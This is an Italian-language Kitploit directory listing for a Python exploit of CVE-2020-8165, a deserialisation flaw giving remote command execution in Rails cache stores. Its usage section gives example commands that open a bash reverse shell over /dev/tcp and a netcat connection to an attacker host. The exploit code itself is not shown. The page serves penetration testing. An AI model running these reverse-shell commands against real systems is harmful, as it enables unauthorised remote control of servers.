Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-8165 — Exploit Python per CVE-2020-8165 che colpisce Rails MemCacheStore e RedisCacheStore. Consente l'esecuzione remota di comandi tramite unmarshalling di oggetti forniti dall'utente con interfaccia basata su argparse. | Kitploit
Strumenti/GitHubGitHub/hybryx/cve-2020-8165
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubhybryx/cve-2020-8165

CVE-2020-8165

Exploit Python per CVE-2020-8165 che colpisce Rails MemCacheStore e RedisCacheStore. Consente l'esecuzione remota di comandi tramite unmarshalling di oggetti forniti dall'utente con interfaccia basata su argparse.

Vedi Repository
45 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-8165 Exploit Python

Questo è un codice per sfruttare CVE-2020-8165 usando Python3. Questo exploit funziona con Rails < 5.2.4.3, Rails < 6.0.3.1. L'exploit consente a un aggressore di deserializzare oggetti forniti dall'utente in MemCacheStore e RedisCacheStore. Questo codice exploit utilizza ArgParse per consentire all'utente di sfruttare questa vulnerabilità in modo molto semplice.

Utilizzo

Ci sono cinque argomenti per questo exploit:

  • rHost - L'indirizzo IP dell'host remoto target
  • rPort - Il numero di porta dell'host remoto target su cui Rails è in esecuzione
  • email - L'email utilizzata per accedere al servizio
  • password - La password dell'account per accedere al servizio
  • cmd - Il comando da eseguire, tra virgolette per gestire gli spazi

Esempi:

  • python3 exploit.py 10.10.10.X 8080 [email protected] password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
  • python3 exploit.py 10.10.10.X 8080 [email protected] password "nc 10.10.X.X 8989"

Crediti Principali

Dettagli originali del CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165 Codice exploit Pastebin che ho ritoccato e a cui ho aggiunto arg parse: https://pastebin.com/jpHpdBTk

Scarica lo strumento